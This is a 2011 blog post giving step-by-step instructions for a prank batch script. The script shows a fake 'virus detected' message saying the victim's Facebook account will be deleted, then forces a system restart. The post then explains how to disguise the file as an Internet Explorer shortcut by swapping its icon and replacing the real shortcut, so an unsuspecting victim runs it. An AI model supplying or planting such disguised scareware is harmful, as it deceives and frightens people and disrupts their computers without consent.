Saturday, 15 October 2011

Make Account has been deleted in Friends Pc - Trick

https://lh3.googleusercontent.com/-_If0Boz56qY/TWtCYjcRjyI/AAAAAAAAALg/qV06nIvbbA0/s1600/facebook-phishing.jpg 

This trick will make the victim think they have got a virus when they click on an icon such as Internet Explorer . You can use any website name as per ur wish i.e. rediff , yahoo , facebook etc. etc. I will be using Facebook.


1) Open notepad

2) Type this in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

Note : The digit "300" which you see in above syntax is time. you can decrease or increase time as per ur wish . If u want to set 2 minute shutdown time , then write "120" instead of "300" i.e. converting minutes into seconds.






3) Save as Internet Explorer.bat






4) Right click on Internet Explorer .bat and click Create Shortcut


[


5) Right click on shorcut and click Properties.




6) Click Change Icon





7) Choose Internet Explorer icon or similar , click OK , then click Apply





8) Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:

0 comments:

Post a Comment